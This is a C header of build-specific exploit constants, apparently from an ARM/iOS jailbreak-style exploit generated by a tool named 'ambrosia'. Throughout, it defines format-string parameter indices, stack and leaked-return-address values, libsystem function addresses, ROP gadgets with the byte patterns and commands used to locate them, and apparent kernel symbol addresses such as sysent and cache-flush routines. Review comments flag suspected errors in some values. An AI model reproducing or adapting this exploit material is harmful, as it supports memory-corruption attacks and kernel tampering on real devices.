/*
There are probably offsets that still need to be updated by hand; this file can ONLY guarantee correct offsets for the following (except _syslog, which has not been verified):
#ifdef DEBUG
#define _syslog 0x69fc8
#endif
#define _dsc_mmap 0x307c5658 + 1
#define _dsc_open 0x307d4dc4
#define _dsc_mkdir 0x307c7c34
#define _dsc_ioctl 0x307c6bf8 + 1
#define _dsc_close 0x307c571c
#define _dsc_exit 0x320a49d0 + 1
#define _dsc_mount 0x307d66e4
#define _dsc_unmount 0x307d7040
#define _dsc_fopen 0x320a2004 + 1
#define _dsc_fclose 0x320a265c + 1
#define _dsc_fread 0x320a8814 + 1
#define _dsc_syscall 0x307d5afc
#define IOLOG (0x80203edc + 1)
Still working on getting these two gadgets (how they were located is shown below):
#define LIBC_POP_R0123 0x32109b10
#define LIBC_BLX_R4_POP_R47 (0x320bcf38 + 1)
LIBC_POP_R0123 find 0f80bde8 in libsystem_c.dylib = 0x077b10
machoman libsystem_c.dylib -a 0x077b10
LIBC_BLX_R4_POP_R47 find a0 47 04 46 20 46 90 bd in libsystem_c.dylib = 0x02A2F38
machoman libsystem_c.dylib -a 0x02A2F38
This file is generated by ambrosia (presumably the AMB_* tokens below are the placeholders it fills in).
*/
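#ifndef AMBROSIA_CONSTANTS_H
#define AMBROSIA_CONSTANTS_H

/*
 * Build-specific exploit constants: format-string parameter indices, stack
 * addresses, libsystem function addresses and ROP gadgets, plus a handful of
 * 0x80xxxxxx addresses (presumably kernel symbols).  The AMB_* tokens are
 * placeholders substituted by the ambrosia generator (see the header comment
 * above).  Every value is tied to one specific firmware / shared-cache build
 * and is meaningless on any other build.
 *
 * Address convention used throughout: a "+ 1" sets the low bit of the target
 * address, which on ARM selects Thumb state for a branch-and-exchange
 * (blx / pop {pc}) target; entries without it are ARM-state targets.
 */

//#define DEBUG

// Number of decimal digits of the target PID as it appears in the log line.
// LOG_SHIFT is derived from it, so a PID with a different digit count would
// shift every format-string index -- TODO confirm against the log-format code.
#define STRLEN_PID 2
#define LOG_SHIFT (35 + STRLEN_PID)

// Format-string parameter indices.  (*p1)==p2 is the trick used to exploit
// format strings on OSX; p3 is an otherwise unused parameter that is used as
// a pointer to an arbitrary address.
#define P1 619
#define P2 625
#define P3 678

// p2 address: 0x2fdffe[44]; p3 sits (P3 - P2) 4-byte stack slots above it.
// Fully parenthesised and without a trailing ';' so it can be used inside a
// larger expression (the old definition expanded to "0x44 + ... ;", which
// breaks any use other than a bare statement).
// NOTE(review): with P2=625 / P3=678 this evaluates to 0x118, which does not
// fit in one byte despite the _LO name -- confirm how the consumer uses it.
#define P3_ADDR_LO (0x44 + (P3 - P2) * 4)

// Saved LR inside _vasprintf_l, after the call to j__malloc_zone_malloc.
// Address of parameter #605:
//   <p2 address> - (P2 - 605) * 4
//   0x2fdffe44 - (625 - 605) * 4 = 0x2fdffdf4
#define LEAKED_LIBC_SAVED_LR_ADDR 0x2fdffdf4
// Expected value of that saved LR.
// FIXME: the base 0x320991b3 already has the low (Thumb) bit set, so "+ 1"
// makes it even (0x320991b4) -- unlike every other "+ 1" entry in this file,
// whose base is even.  Verify which value is intended before relying on this
// as a leak sanity check; a wrong expected value would reject a valid leak.
#define LEAKED_LIBC_SAVED_LR_SHOULD_BE (0x320991b3 + 1) //FIXME:
#define ROP_ABS_ADDR 0x2fdffe30

// libsystem function addresses ("dsc" presumably = dyld shared cache), filled
// in by ambrosia.  Note _dsc_execve has no counterpart in the hand-resolved
// list in the header comment.
#define _dsc_mmap (AMB_MMAP + 1)
#define _dsc_open AMB_OPEN
#define _dsc_mkdir AMB_MKDIR
#define _dsc_ioctl (AMB_IOCTL + 1)
#define _dsc_close AMB_CLOSE
#define _dsc_mount AMB_MOUNT
#define _dsc_unmount AMB_UNMOUNT
#define _dsc_syscall AMB_SYSCALL
#define _dsc_execve AMB_EXECVE
#define _dsc_fopen (AMB_FOPEN + 1)
#define _dsc_fclose (AMB_FCLOSE + 1)
#define _dsc_fread (AMB_FREAD + 1)
#define _dsc_exit (AMB_EXIT + 1)

// ROP gadgets in libsystem_c.dylib.  The byte patterns given in the header
// comment decode as:
//   LIBC_POP_R0123      e8bd800f  -> pop {r0, r1, r2, r3, pc}         (ARM)
//   LIBC_BLX_R4_POP_R47 47a0 4604 4620 bd90
//                       -> blx r4; mov r4, r0; mov r0, r4; pop {r4, r7, pc}  (Thumb)
#define LIBC_POP_R0123 AMB_R0123
#define LIBC_BLX_R4_POP_R47 (AMB_POPR47 + 1)

// 0x80xxxxxx addresses -- presumably kernel symbols; also build-specific.
#define ZFREE (0x8002f3d0 + 1)
#define SYSENT 0x802ccbac
#define IOLOG (AMB_IOLOG + 1)
#define FLUSH_DCACHE_ALL 0x80071b0c
#define INVALIDATE_ICACHE_ALL 0x800719c4

#endif /* AMBROSIA_CONSTANTS_H */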